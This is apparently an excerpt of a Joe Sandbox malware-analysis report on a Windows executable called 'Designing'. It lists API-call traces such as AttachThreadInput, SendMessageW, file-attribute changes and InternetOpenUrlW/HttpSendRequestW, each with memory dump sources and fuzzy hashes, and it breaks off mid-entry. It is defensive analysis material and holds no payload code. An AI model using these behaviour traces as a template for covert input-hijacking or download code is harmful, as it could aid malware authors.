                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18DDA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 1464919966-438819550
                                                                                                                                                                              • Opcode ID: d14ecf24bbf4b0d3f2f828f39acbbb6a372f8bd84111e29334022bb06a068cf8
                                                                                                                                                                              • Instruction ID: 0f98daa242fd61ebcbeee50bdcbde00bb3fc89091761f8dcf08624c386dfbda7
                                                                                                                                                                              • Opcode Fuzzy Hash: d14ecf24bbf4b0d3f2f828f39acbbb6a372f8bd84111e29334022bb06a068cf8
                                                                                                                                                                              • Instruction Fuzzy Hash: BD6159B25043059FCB10EF60D9449DEB7E9FF89314F04492EF989A7251DB31E985CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DE39E2,00000004,00000000,00000000), ref: 00DBFC41
                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DE39E2,00000004,00000000,00000000), ref: 00DFFC15
                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DE39E2,00000004,00000000,00000000), ref: 00DFFC98
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 1268545403-2063206799
                                                                                                                                                                              • Opcode ID: 5b732f4dd57646b30d382c076f44567f83eaf6823293926a91980ee0cea7ec83
                                                                                                                                                                              • Instruction ID: aa292f17b9be69d72528b07d2bdb4799c0970e68e8dd115baf9e038e2dd8833f
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b732f4dd57646b30d382c076f44567f83eaf6823293926a91980ee0cea7ec83
                                                                                                                                                                              • Instruction Fuzzy Hash: F741823160838CDEC7358B399DC9BBA7FA1AF46350F19852DEA8756A60C671A8C4C731
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateMenu.USER32 ref: 00E34715
                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00E34724
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E347AC
                                                                                                                                                                              • IsMenu.USER32(?), ref: 00E347C0
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00E347CA
                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E347F7
                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00E347FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                              • String ID: 0$F
                                                                                                                                                                              • API String ID: 161812096-3044882817
                                                                                                                                                                              • Opcode ID: 89d4e933af0ff7532e407e1a1026fef005067607833a5f13371eb4ddb084567d
                                                                                                                                                                              • Instruction ID: 8c94f4a8b9ec015ec91e93493bfba233c9d6da4d50460a5db43b530d4ca52e5d
                                                                                                                                                                              • Opcode Fuzzy Hash: 89d4e933af0ff7532e407e1a1026fef005067607833a5f13371eb4ddb084567d
                                                                                                                                                                              • Instruction Fuzzy Hash: ED418BB5A01209EFDB14CF65E888EAA7BB5FF49314F14402DFA45A7390C770A914CF50
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E028B1
                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 00E028BC
                                                                                                                                                                              • GetParent.USER32 ref: 00E028D8
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E028DB
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00E028E4
                                                                                                                                                                              • GetParent.USER32(?), ref: 00E028F8
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E028FB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                              • Opcode ID: 7dbd930b19bbfaee9d0534b1a33e01eee12337ed370470ca695c341ed56dfd52
                                                                                                                                                                              • Instruction ID: d81e9d6c9e3536ef8078e0555e3948e55a428202e412178557f703ea4aa2f9c2
                                                                                                                                                                              • Opcode Fuzzy Hash: 7dbd930b19bbfaee9d0534b1a33e01eee12337ed370470ca695c341ed56dfd52
                                                                                                                                                                              • Instruction Fuzzy Hash: 8121AFB5900118BFCF05ABA0DC89EEEBBB4EF06350F40511ABA62B72D1DB355859DB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E02990
                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 00E0299B
                                                                                                                                                                              • GetParent.USER32 ref: 00E029B7
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E029BA
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00E029C3
                                                                                                                                                                              • GetParent.USER32(?), ref: 00E029D7
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E029DA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                              • Opcode ID: 0b5c2dfa1aecb9de668ad5fb70ba807bfffedc0649d7bbf44d5448a7ac168b03
                                                                                                                                                                              • Instruction ID: 1b954e7ee385bd7ceedd5e8df6ca5b0fbfeb1be4aed66e9739241b0102fc28bf
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5c2dfa1aecb9de668ad5fb70ba807bfffedc0649d7bbf44d5448a7ac168b03
                                                                                                                                                                              • Instruction Fuzzy Hash: 30218EB5900218BBCF11ABA0DC89EEEBFB8EF15350F405016BA51B71D5CA758859DB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E34539
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E3453C
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E34563
                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E34586
                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E345FE
                                                                                                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E34648
                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E34663
                                                                                                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E3467E
                                                                                                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E34692
                                                                                                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E346AF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 312131281-0
                                                                                                                                                                              • Opcode ID: c2517d786a5653ee4cb5988882372f28322ce701c59c5ed1b558626dc8edd2d6
                                                                                                                                                                              • Instruction ID: 8d48826303cf08cfc4fd441a779d1d2c7224b354ecd91a8aa07cf6ff62488165
                                                                                                                                                                              • Opcode Fuzzy Hash: c2517d786a5653ee4cb5988882372f28322ce701c59c5ed1b558626dc8edd2d6
                                                                                                                                                                              • Instruction Fuzzy Hash: C76179B5A00208AFDB10DFA4CC85EEE7BF8EB49314F140159FA15A72E1C774AA49DB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E0BB18
                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BB2C
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00E0BB33
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BB42
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E0BB54
                                                                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BB6D
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BB7F
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BBC4
                                                                                                                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BBD9
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E0ABA8,?,00000001), ref: 00E0BBE4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2156557900-0
                                                                                                                                                                              • Opcode ID: ab17eb2e051f8f8570cfea5c5f504404ad2930e12aa3cb3b187d1967afe0b37e
                                                                                                                                                                              • Instruction ID: 4ba2efff99921a4f071fb2316279e4af0601bcafe4ac2378ad700643fcdc29d4
                                                                                                                                                                              • Opcode Fuzzy Hash: ab17eb2e051f8f8570cfea5c5f504404ad2930e12aa3cb3b187d1967afe0b37e
                                                                                                                                                                              • Instruction Fuzzy Hash: 1B3180B1904208AFDB10DB16EC89F697BA9BB54316F114005FA19F61E4D7B498848F61
                                                                                                                                                                              APIs
                                                                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DA2AF9
                                                                                                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 00DA2B98
                                                                                                                                                                              • UnregisterHotKey.USER32(?), ref: 00DA2D7D
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00DE3A1B
                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00DE3A80
                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DE3AAD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                              • String ID: close all
                                                                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                                                                              • Opcode ID: 9540512558f3486804aea4708771578b9db73d48238e076654c19421d2fbe4fe
                                                                                                                                                                              • Instruction ID: a01c50d44c76317d29650c664c03692ecf82dcfeae1f4f58a43d894f531f028e
                                                                                                                                                                              • Opcode Fuzzy Hash: 9540512558f3486804aea4708771578b9db73d48238e076654c19421d2fbe4fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 02D13A31605252DFCB19EF1AD849A79F7A0EF05710F1542ADE44AAB262CB31ED52CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E189F2
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18A06
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00E18A30
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E18A4A
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18A5C
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18AA5
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E18AF5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 769691225-438819550
                                                                                                                                                                              • Opcode ID: af89e207eea9a924055e380bf096c21467839f23a8b3cdb033499584e82e0c34
                                                                                                                                                                              • Instruction ID: f53b42d73a71e42125a61c4ebf7d347eb70c8d0b964e33dc4e153c2720e28896
                                                                                                                                                                              • Opcode Fuzzy Hash: af89e207eea9a924055e380bf096c21467839f23a8b3cdb033499584e82e0c34
                                                                                                                                                                              • Instruction Fuzzy Hash: 1381AE719042459FCB24EE14CA44AFAB3E8FF95314F585C2AF889E7250DB34D985CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00E38992
                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00E3899E
                                                                                                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00E38A79
                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00E38AAC
                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00E38AE4
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00E38B06
                                                                                                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E38B1E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 4072528602-2063206799
                                                                                                                                                                              • Opcode ID: 2dfbc5d1ccfa702f3468b93ff62a76a28147de6120369287e15c71691d329e4b
                                                                                                                                                                              • Instruction ID: 52105378b0d6b59f23a569b0d52802b5c04a543420befdb25da99f3f30bd9fe3
                                                                                                                                                                              • Opcode Fuzzy Hash: 2dfbc5d1ccfa702f3468b93ff62a76a28147de6120369287e15c71691d329e4b
                                                                                                                                                                              • Instruction Fuzzy Hash: D171DD34604308AFDB21DF65CA88FBABFB5EF49304F14245AF99977261CB31A984CB10
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00DA74D7
                                                                                                                                                                                • Part of subcall function 00DA7567: GetClientRect.USER32(?,?), ref: 00DA758D
                                                                                                                                                                                • Part of subcall function 00DA7567: GetWindowRect.USER32(?,?), ref: 00DA75CE
                                                                                                                                                                                • Part of subcall function 00DA7567: ScreenToClient.USER32(?,?), ref: 00DA75F6
                                                                                                                                                                              • GetDC.USER32 ref: 00DE6083
                                                                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DE6096
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00DE60A4
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00DE60B9
                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00DE60C1
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DE6152
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                              • String ID: U
                                                                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                                                                              • Opcode ID: f6ee13f3c521d4cc84e07c7b287f6154ec04ebf8ca8e1539b7645df75a5f8e6c
                                                                                                                                                                              • Instruction ID: e95dadc4a1af682537387e6849c43325ab870a60a9663169420c4bb4e41179bf
                                                                                                                                                                              • Opcode Fuzzy Hash: f6ee13f3c521d4cc84e07c7b287f6154ec04ebf8ca8e1539b7645df75a5f8e6c
                                                                                                                                                                              • Instruction Fuzzy Hash: B2710131404245DFCF22EF65CC84AAA7FB1FF593A0F184269ED955A2A6C731C880DB70
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E1CCB7
                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E1CCDF
                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E1CD0F
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E1CD67
                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00E1CD7B
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00E1CD86
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3113390036-3916222277
                                                                                                                                                                              • Opcode ID: 180de7431462c348360be996e933c6d6b960317eda8380943908bf63e015f1ef
                                                                                                                                                                              • Instruction ID: 0c67e8ff429352685e316faabb6d3dd299c3a0e8c102fa59bffe2aa3afb2ec45
                                                                                                                                                                              • Opcode Fuzzy Hash: 180de7431462c348360be996e933c6d6b960317eda8380943908bf63e015f1ef
                                                                                                                                                                              • Instruction Fuzzy Hash: D2317FB1544208AFD721AF65AC88AEB7FFCEB45744B20552EF446E3210DB34DD889B61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DE55AE,?,?,Bad directive syntax error,00E3DCD0,00000000,00000010,?,?), ref: 00E0A236
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00DE55AE,?), ref: 00E0A23D
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E0A301
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
